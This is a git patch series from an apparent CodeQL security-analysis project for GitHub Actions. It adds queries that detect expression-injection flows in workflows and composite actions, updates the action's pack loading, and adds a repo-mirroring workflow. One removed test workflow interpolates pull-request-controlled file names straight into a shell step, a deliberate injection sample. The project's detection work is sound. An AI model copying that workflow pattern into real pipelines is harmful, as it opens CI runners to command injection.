("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { - desc = { enumerable: true, get: function() { return m[k]; } }; - } - Object.defineProperty(o, k2, desc); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.clonePackRepo = exports.runCommandJson = exports.runCommand = exports.newGHConfig = void 0; -const path = __importStar(__nccwpck_require__(1017)); -const core = __importStar(__nccwpck_require__(2186)); -const toolrunner = __importStar(__nccwpck_require__(8159)); -async function newGHConfig() { - return { - path: "/usr/bin/", - }; -} -exports.newGHConfig = newGHConfig; -async function runCommand(config, args) { - var bin = path.join(config.path, "gh"); - let output = ""; - var options = { - listeners: { - stdout: (data) => { - output += data.toString(); - }, - }, - }; - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - return output.trim(); -} -exports.runCommand = runCommand; -async function runCommandJson(config, args) { - return JSON.parse(await runCommand(config, args)); -} -exports.runCommandJson = runCommandJson; -async function clonePackRepo(gh, path) { - try { - await runCommand(gh, [ - "repo", - "clone", - "GitHubSecurityLab/codeql-actions", - path, - ]); - return true; - } - catch (error) { - core.warning("Failed to clone pack from GitHub..."); - } - return false; -} -exports.clonePackRepo = clonePackRepo; - - /***/ }), /***/ 6144: @@ -28847,17 +28757,12 @@ exports.run = void 0; const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); const cql = __importStar(__nccwpck_require__(950)); -const gh = __importStar(__nccwpck_require__(1772)); /** * The main function for the action. * @returns {Promise} Resolves when the action is complete. */ async function run() { try { - // set up gh - var ghc = await gh.newGHConfig(); - core.debug(`GH CLI found at '${ghc.path}'`); - await gh.runCommand(ghc, ["version"]); // set up codeql var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); @@ -28873,21 +28778,17 @@ async function run() { core.setFailed("CodeQL Yaml extractor not installed"); throw new Error("CodeQL Yaml extractor not installed"); } - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); - let pack_path = "/tmp/codeql-actions"; - var pack_cloned = await gh.clonePackRepo(ghc, pack_path); - core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); - if (pack_cloned === false) { - throw new Error("Could not clone the actions ql pack"); + // download pack + core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); } - core.info(`Installing CodeQL Actions packs from '${pack_path}'`); - var pack_installed = await cql.installPack(codeql, pack_path); - if (pack_installed === false) { - throw new Error("Could not install the actions ql packs"); + else { + core.info(`Pack downloaded '${codeql.pack}'`); } - core.info(`Pack path: '${pack_path}'`); - codeql.pack = path.join(pack_path, "ql", "src"); - core.info(`Codeql Queries pack path: '${codeql.pack}'`); core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); core.info("Running CodeQL analysis..."); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 7cb1dab48e5..ad787814448 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -106,20 +106,6 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { return false; } -export async function installPack( - codeql: CodeQLConfig, - dir: string, -): Promise { - try { - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); - return true; - } catch (error) { - core.warning("Failed to install local packs ..."); - } - return false; -} - export async function codeqlDatabaseCreate( codeql: CodeQLConfig, ): Promise { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts deleted file mode 100644 index 668e559e40b..00000000000 --- a/.github/action/src/gh.ts +++ /dev/null @@ -1,59 +0,0 @@ -import * as path from "path"; -import * as core from "@actions/core"; -import * as toolrunner from "@actions/exec/lib/toolrunner"; - -export interface GHConfig { - // The path to the codeql bundle. - path: string; -} - -export async function newGHConfig(): Promise { - return { - path: "/usr/bin/", - }; -} - -export async function runCommand( - config: GHConfig, - args: string[], -): Promise { - var bin = path.join(config.path, "gh"); - let output = ""; - var options = { - listeners: { - stdout: (data: Buffer) => { - output += data.toString(); - }, - }, - }; - - await new toolrunner.ToolRunner(bin, args, options).exec(); - core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); - - return output.trim(); -} - -export async function runCommandJson( - config: GHConfig, - args: string[], -): Promise { - return JSON.parse(await runCommand(config, args)); -} - -export async function clonePackRepo( - gh: GHConfig, - path: string, -): Promise { - try { - await runCommand(gh, [ - "repo", - "clone", - "GitHubSecurityLab/codeql-actions", - path, - ]); - return true; - } catch (error) { - core.warning("Failed to clone pack from GitHub..."); - } - return false; -} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 717782b555c..b07bef25e84 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -1,7 +1,6 @@ import * as path from "path"; import * as core from "@actions/core"; import * as cql from "./codeql"; -import * as gh from "./gh"; /** * The main function for the action. @@ -9,13 +8,6 @@ import * as gh from "./gh"; */ export async function run(): Promise { try { - // set up gh - var ghc = await gh.newGHConfig(); - - core.debug(`GH CLI found at '${ghc.path}'`); - - await gh.runCommand(ghc, ["version"]); - // set up codeql var codeql = await cql.newCodeQL(); @@ -36,26 +28,19 @@ export async function run(): Promise { throw new Error("CodeQL Yaml extractor not installed"); } - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); - let pack_path = "/tmp/codeql-actions"; - var pack_cloned = await gh.clonePackRepo(ghc, pack_path); - core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); + // download pack + core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + var pack_downloaded = await cql.downloadPack(codeql); - if (pack_cloned === false) { - throw new Error("Could not clone the actions ql pack"); + if (pack_downloaded === false) { + var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + codeql.pack = path.join(action_path, "ql", "src"); + + core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + } else { + core.info(`Pack downloaded '${codeql.pack}'`); } - core.info(`Installing CodeQL Actions packs from '${pack_path}'`); - var pack_installed = await cql.installPack(codeql, pack_path); - - if (pack_installed === false) { - throw new Error("Could not install the actions ql packs"); - } - - core.info(`Pack path: '${pack_path}'`); - codeql.pack = path.join(pack_path, "ql", "src"); - core.info(`Codeql Queries pack path: '${codeql.pack}'`); - core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 7380ae46d07..78fec3b00eb 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - uses: dorny/paths-filter@4512585405083f25c027a35db413c2b3b9006d50 + - uses: dorny/paths-filter@v3 id: changes with: filters: | @@ -26,5 +26,3 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' uses: ./ - with: - extractor-version: latest diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 5040865be1d..1e30061bf45 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -7,12 +7,13 @@ module DataFlow { private import codeql.actions.dataflow.internal.DataFlowImplSpecific import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic - - /** debug */ + // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC + module ActionsConsistency implements DFIC::InputSig { } + module Consistency { - import DFIC::MakeConsistency - } + import DFIC::MakeConsistency + } } From 8ae1e26d5d2072f4c38ed841a6b5f174b6a54c9b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 15:49:29 +0100 Subject: [PATCH 0053/1267] fix(action): qls reference --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 2 +- .github/action/src/index.ts | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 501ce250969..e931e22d3f8 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28707,7 +28707,7 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { codeql_output, ]; // remote pack or local pack - if (codeql.pack.startsWith("GitHubSecurityLab/")) { + if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; } else { @@ -28779,7 +28779,7 @@ async function run() { throw new Error("CodeQL Yaml extractor not installed"); } // download pack - core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); var pack_downloaded = await cql.downloadPack(codeql); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index ad787814448..48750388e57 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -148,7 +148,7 @@ export async function codeqlDatabaseAnalyze( ]; // remote pack or local pack - if (codeql.pack.startsWith("GitHubSecurityLab/")) { + if (codeql.pack.startsWith("githubsecuritylab/")) { var suite = codeql.pack + ":" + codeql.suite; } else { // assume path diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b07bef25e84..b1a4fc80c64 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -29,7 +29,7 @@ export async function run(): Promise { } // download pack - core.info(`Downloading CodeQL IaC pack '${codeql.pack}'`); + core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); var pack_downloaded = await cql.downloadPack(codeql); if (pack_downloaded === false) { From 43a55e80a9991a6347a26ff452893ad32f3397cd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 16:02:10 +0100 Subject: [PATCH 0054/1267] feat(model-generator): New qls for modelling composite actions --- action.yml | 8 ++------ ql/src/Security/CWE-020/CompositeActionSummaries.ql | 1 + ql/src/Security/CWE-020/CompositeActionsSources.ql | 1 + ql/src/codeql-suites/actions-summaries-queries.qls | 8 ++++++++ 4 files changed, 12 insertions(+), 6 deletions(-) create mode 100644 ql/src/codeql-suites/actions-summaries-queries.qls diff --git a/action.yml b/action.yml index ed6eb327a9e..61fd380c418 100644 --- a/action.yml +++ b/action.yml @@ -8,16 +8,12 @@ inputs: source-root: description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." - default: "./" + default: ${{ github.workspace }} - sarif: + sarif-output: description: "SARIF File Output" default: "codeql-actions.sarif" -# runs: -# using: "node16" -# main: ".github/action/dist/index.js" - runs: using: 'composite' steps: diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 875492644b8..e2843326e74 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -7,6 +7,7 @@ * @precision high * @id actions/composite-action-summaries * @tags actions + * model-generator * external/cwe/cwe-020 */ diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 19c43ad3066..67adac7dd32 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -7,6 +7,7 @@ * @precision high * @id actions/composite-action-sources * @tags actions + * model-generator * external/cwe/cwe-020 */ diff --git a/ql/src/codeql-suites/actions-summaries-queries.qls b/ql/src/codeql-suites/actions-summaries-queries.qls new file mode 100644 index 00000000000..5526197c7db --- /dev/null +++ b/ql/src/codeql-suites/actions-summaries-queries.qls @@ -0,0 +1,8 @@ +- description: Queries to model composite actions +- queries: . + +- include: + kind: + - path-problem + tags contain: + - model-generator From 4e44444d5a40de132104f3bd45138e58f6ae0396 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 16 Feb 2024 16:03:01 +0100 Subject: [PATCH 0055/1267] Add copy workflow --- .github/workflows/copy-to-bughalla.yml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 .github/workflows/copy-to-bughalla.yml diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml new file mode 100644 index 00000000000..943935caa4a --- /dev/null +++ b/.github/workflows/copy-to-bughalla.yml @@ -0,0 +1,20 @@ +name: Copy to Bughalla + +on: push + +permissions: + contents: read + +jobs: + copy: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - run: gh auth setup-git + env: + GITHUB_TOKEN: ${{ secrets.BUGHALLA_TOKEN }} + + - run: rm -rf .github/workflows/copy-to-bughalla.yml + - run: git remote add fork https://github.com/bughalla/codeql-actions + - run: git push fork master --force From 7c3503e6c72c30057954534b5c65a8a0b3b5e4ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 16:03:38 +0100 Subject: [PATCH 0056/1267] fix: remove debug leftovers --- .github/workflows/simple2.yml | 42 ----------------------------------- 1 file changed, 42 deletions(-) delete mode 100644 .github/workflows/simple2.yml diff --git a/.github/workflows/simple2.yml b/.github/workflows/simple2.yml deleted file mode 100644 index b40f5eb6ac0..00000000000 --- a/.github/workflows/simple2.yml +++ /dev/null @@ -1,42 +0,0 @@ -name: CI - -on: - pull_request: - branches: - - main - -jobs: - changed_files: - runs-on: ubuntu-latest - name: Test changed-files - steps: - - uses: actions/checkout@v4 - with: - fetch-depth: 0 - - - name: Get changed files - id: source - uses: tj-actions/changed-files@v40 - - - name: Remove foo from changed files - id: step - uses: mad9000/actions-find-and-replace-string@3 - with: - source: ${{ steps.source.outputs.all_changed_files }} - find: 'foo' - replace: '' - - - name: List all changed files - id: sink - run: | - for file in ${{ steps.step.outputs.value }}; do - echo "$file was changed" - done - - - name: List all changed files - id: no-flow - run: | - for file in ${{ steps.source.outputs.all_changed_files_count }}; do - echo "$file was changed" - done - From 5cb9c21e05ccf0dc2fd860059213820fee5d64f0 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 16 Feb 2024 16:06:05 +0100 Subject: [PATCH 0057/1267] Fetch before push --- .github/workflows/copy-to-bughalla.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 943935caa4a..87506a217f6 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -17,4 +17,5 @@ jobs: - run: rm -rf .github/workflows/copy-to-bughalla.yml - run: git remote add fork https://github.com/bughalla/codeql-actions + - run: git fetch fork - run: git push fork master --force From 334fda18ba16dd2fd3878d680997a709f15a29b1 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Fri, 16 Feb 2024 16:39:40 +0100 Subject: [PATCH 0058/1267] Fix copy workflow --- .github/workflows/copy-to-bughalla.yml | 26 ++++++++++++++++++-------- 1 file changed, 18 insertions(+), 8 deletions(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 87506a217f6..9e0fee9a0f7 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -10,12 +10,22 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - - run: gh auth setup-git - env: - GITHUB_TOKEN: ${{ secrets.BUGHALLA_TOKEN }} + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 - - run: rm -rf .github/workflows/copy-to-bughalla.yml - - run: git remote add fork https://github.com/bughalla/codeql-actions - - run: git fetch fork - - run: git push fork master --force + - run: | + rm -rf .github/workflows/copy-to-bughalla.yml + git remote set-url --push origin git@github.com:bughalla/codeql-actions + git config user.name 'github-actions[bot]' + git config user.email 'github-actions[bot]@users.noreply.github.com' + git add -v . + git commit -m 'Actions: Add patch' + + - name: Push changes + uses: ad-m/github-push-action@35284cf030a5836cb567a7bf1b39ebafbfae5f4a + with: + repository: bughalla/codeql-actions + github_token: ${{ secrets.BUGHALLA_TOKEN }} + branch: ${{ github.ref }} + force: true \ No newline at end of file From 1d582a4c4d21e3bf272a8a547c076493821354dc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 10:50:02 +0100 Subject: [PATCH 0059/1267] feat(model-generation): Add more model generation queries Add new queries for finding reusable workflows that behave as summaries, sources or sinks. Add new query for finding composite actions that behave as sinks. Add `github.event.inputs` context to the regular expression matching input var accesses. --- ql/lib/codeql/actions/Ast.qll | 5 +- .../CWE-020/CompositeActionSummaries.ql | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 42 +++++++++++++++++ .../CWE-020/CompositeActionsSources.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 42 +++++++++++++++++ .../CWE-020/ReusableWorkflowsSources.ql | 46 +++++++++++++++++++ .../CWE-020/ReusableWorkflowsSummaries.ql | 37 +++++++++++++++ 7 files changed, 177 insertions(+), 3 deletions(-) create mode 100644 ql/src/Security/CWE-020/CompositeActionsSinks.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSources.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index b04694ed568..605f658b263 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -369,7 +369,10 @@ private string jobsCtxRegex() { private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } -private string inputsCtxRegex() { result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" } +private string inputsCtxRegex() { + result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" or + result = "\\bgithub\\.event\\.inputs\\.([A-Za-z0-9_-]+)\\b" +} /** * Holds for an expression accesing the `steps` context. diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index e2843326e74..b451d9d1bda 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -31,5 +31,7 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() select sink.getNode(), source, sink, "Summary" diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql new file mode 100644 index 00000000000..525307bcc28 --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -0,0 +1,42 @@ +/** + * @name Composite Action Sinks + * @description Actions passing input variables to expression injection sinks. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 67adac7dd32..b3eb6d348a8 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -40,5 +40,7 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql new file mode 100644 index 00000000000..9317b900158 --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -0,0 +1,42 @@ +/** + * @name Reusable Workflow Sinks + * @description Reusable Workflows passing parameters to an expression injection sink. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-wokflow-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql new file mode 100644 index 00000000000..eeea688b273 --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -0,0 +1,46 @@ +/** + * @name Reusable Workflow Sources + * @description Reusable Workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-sources + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source instanceof DataFlow::ParameterNode and + exists(ReusableWorkflowStmt w | w.getAChildNode*() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql new file mode 100644 index 00000000000..3949488e129 --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -0,0 +1,37 @@ +/** + * @name Reusable Workflows Summaries + * @description Reusable workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-summaries + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Summary" From 010d7df71d36ec98e41f03827fcc14fc949ad1b6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 11:58:54 +0100 Subject: [PATCH 0060/1267] feat(reusable-workflow-models): Reusable workflow MaD Add support to define sources/sinks/summaries for Reusable Workflows as MaD entries. --- .../actions/controlflow/internal/Cfg.qll | 16 ++------------- .../dataflow/internal/DataFlowPrivate.qll | 20 ++++++++++++++++++- .../dataflow/internal/DataFlowPublic.qll | 11 ++++++++++ ql/lib/ext/TEST-RW-MODELS.model.yml | 17 ++++++++++++++++ ql/lib/test/test.ql | 13 ++++++------ .../.github/workflows/calling_workflow.yml | 16 +++++++++++---- 6 files changed, 67 insertions(+), 26 deletions(-) create mode 100644 ql/lib/ext/TEST-RW-MODELS.model.yml diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8808fb0afe5..94a2c6a71e2 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -243,21 +243,9 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { - override ControlFlowTree getChildNode(int i) { - result = - rank[i](Expression child, Location l | - (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } -} +private class UsesExprTree extends LeafTree instanceof UsesExpr { } -private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { +private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 89f31983189..e1a3479cfc0 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -58,7 +58,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow gets called + * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof UsesExpr } @@ -180,6 +180,23 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } +/** + * Holds if there is a local flow step between a ${{ needs.xxx.outputs.yyy }} expression accesing a job output field + * and the step output itself. But only for those cases where the job (needs) output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. + */ +predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(UsesExpr astFrom, NeedsCtxAccessExpr astTo | + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom + ) +} + /** * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} @@ -215,6 +232,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or + needsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 8b62cccf30a..5fe3c741735 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -66,6 +66,17 @@ class ParameterNode extends ExprNode { InputExpr 